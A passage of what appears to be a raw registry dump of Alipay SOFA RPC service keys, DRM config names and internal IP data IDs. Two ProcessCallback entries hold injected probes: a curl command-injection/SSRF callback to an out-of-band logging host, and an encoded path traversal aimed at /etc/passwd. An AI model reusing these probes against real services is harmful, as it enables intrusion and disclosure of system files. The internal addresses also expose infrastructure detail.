facade.AmFlowConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.McenterAntqReplayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.qasync.QaDataSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.16.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finsupport.common.service.facade.antcon.AntConnectorQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jss.facade.service.FlowServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:recoverDataForRejectCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instsign.common.service.facade.instbaseinfo.AntAccountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csoperationmng.service.facade.api.RelationshipService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1301#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acmarketingcore.common.service.facade.activity.MarketProjectManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_INSPLATFORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insiop.common.service.facade.blackmirror.BlackMirrorMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmFileOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.dtemplate.ParmTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.restruct.RestructRepayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.hall.HallServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tbapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.195.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.179.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finaicontentcore.api.BiRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdataassets.facade.graph.GraphServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSAPPORTION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:strategyweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acmcscore.facade.ProductVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.index.IndexTrendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.graymanage.AdmitConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.role.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.wkprod.service.WkConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.OpenpunishServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecogateway.service.notify.facade.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.NodeListQueryApi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.spi.FluxReceiveService:1.0:bkpayplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.common.service.facade.api.process.ProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.meshyserver.common.service.facade.api.AftsFileUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iinnertrans.facade.api.InnerDelayedMsgCheckerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ClientPerfAppidInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchstm_assetReqOrderAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.OssFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.NearMetadataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.PayConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:serviceSearchApplyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbillcenter.facade.service.InstallmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.menu.api.MiniMenuOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.apsdk.settlement.apis.HoldMerchantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.shadowModelTypeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.36.6.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finriskeventseek.facade.SlowSqlWealthSqlhashStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:curl http://MzMwMjQ4NjktdW5pcXVlSWQtMTA0MDAzMDIy.ssrf.noble.log.lynnshare.cc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.common.service.facade.lend.api.InvolvedPartyInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.questionnaire.QuestionnaireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.OverdueRepaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxbase.common.fcprocess.handler.ProcessCallbackHandler:1.0:opsIterationProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyDoubleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkopermng_strategyAduitProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.underwrite.UnderwriteTransFacade:1.0:pcardcoreUnderWriteTransAsync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.gzone.SettlecoreTransactionMapService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.gift.api.MiniGiftMemberPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkfinconsign_commonAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smcp.facade.securityexplore.AeTripFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rpcRouteByGroupWeight:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.102.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.128.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.intimateprod.common.service.facade.api.IntimateInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.merchant.MerchantDstCampaignQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.facade.AppDomainInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.biz.service.cooperation.facade.CommonImageVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.MerchantMaterialManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.charge.censusLogSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.velocityTestProcessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwsap.biz.share.query.QueryManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.158.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.CfpSpecialEnforceWithdrawFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.searchportal.service.integration.kmi.KmiClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergwd4541.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.openid.OpenIdGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gffund.common.service.facade.api.BankLogSwitchingFacade:1.0:bankLogSwitchingFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.antlottery.AntLotteryMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.income.common.service.facade.WriteoffOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dtsermng.common.service.facade.zdatatran.ZdatatransCreateJobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.api.TopicApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.ShopConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omoaidbase.common.service.facade.api.IMMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_CLEARING_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sccore.facade.ThirdPartyCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.shop.mall.MallShopRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequote.api.TrendQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservemng.service.facade.profit.api.ProfitCompareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.ExperimentVersionAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.merchant.MerchantRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cicada4AntProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MFINWORMHOLE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.notify.RemedyNotifyService:1.0:remedyFinBatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.geaBaseWriteOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.biz.shared.gildata.service.GdSecuMainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-inscommunity-scan-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.cssocial.common.service.facade.YqAlarmDataOutputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:intservoptmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthmarket.common.service.facade.service.SubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.brokenScreenProdIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.speech.api.draft.DraftFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.o2o.facade.PrincipalConstraintFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trdataasset.common.service.facade.query.DbQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.luckyfish.repo.FinsCampRecordRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finboss_antProcessBkfCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.partnerprod.common.service.facade.investigate.InvestigateTaskHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.minicore.MinicoreFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.116.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.merchant.facade.api.BannerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.MctTmpAmountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_MPA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mobileanti@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CCR_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.176.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_B_BATCH_REFUND_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.drc.rm.endpoint.openapi.AntqwriterMonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.aciamcore.common.service.facade.app.AppServiceAccountServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.biz.shared.split.ManualTaskTriggerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.blockingQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.compcore.common.service.facade.jobd.api.JobdExecuteService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:miniselfop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.comanagement.ComanagementAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acmeteragecore.common.service.facade.back.MeterDomainConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.ContentElementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.MoCustomerUserQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.mrchpoint.facade.MrchPointServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.spi.ParmMntListEditValidateSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-inshealthbatch-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bumng:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.DispatchReceiptService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTDATALINK#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:channelspweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EchannelGroupQueryCallbackFacade:1.0:echannelcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanGrantBankDrm.signThirtyDaysNotSupportedOrgCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:idpatrol@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.MetaServiceFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.InfoSecCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.bops.ShopTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.0.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.rockfuzz.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dchainprod.common.facade.query.TradeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:accorderexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:merchantSignKBCheckValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:transferprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.plugin.IscElementMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.dataoperation.component.BizAppSaveDataOperateService:1.0:spcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.core.check.CheckExecutionEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-F-SC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.241.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.27.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.approdcenter:name=com.alipay.ap.prodcenter.client.Config.isRemoteService,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.AcquireCaptureVostroService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantShopGzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorCzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.247.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.punishcenter.common.service.facade.PunishStrategyRepositoryRefreshService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.web.infoview.drm.InfoviewResourceDRM.webCateStockDataBroadCast,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.util.TradeNotifyTriggerTool:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_CTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.59.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.amc.service.AmcDisplayColumnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.dynamic.bumng.bumngDataSource.doublewrite.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.AmdpQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CUSTCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.reportengine.MetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:govdataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydatalib.common.facade.service.schema.VersaTableLoadFacade:1.0:security_versatableload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.aedy.facade.AedyHbaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@openitemcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:minicenterAntProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uctcep.common.service.facade.model.ModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:openhome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.creditacceptance.common.service.facade.CaGuaranteeQueryRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_instFrameArSignCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:mrchstm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:campProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.160.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.bizprod.common.service.facade.api.kyc.VerificationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SMARTSQLOCB#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdAccountQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.buffett.recommend.RecommendComponentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imerchantsettle.common.service.facade.api.SettleSupplementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appstore.common.service.facade.operation.CommodityOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.hitchqualitative.UsabilityQualitativeIndicatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcconsultcore.common.service.facade.api.RcCategoryAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.d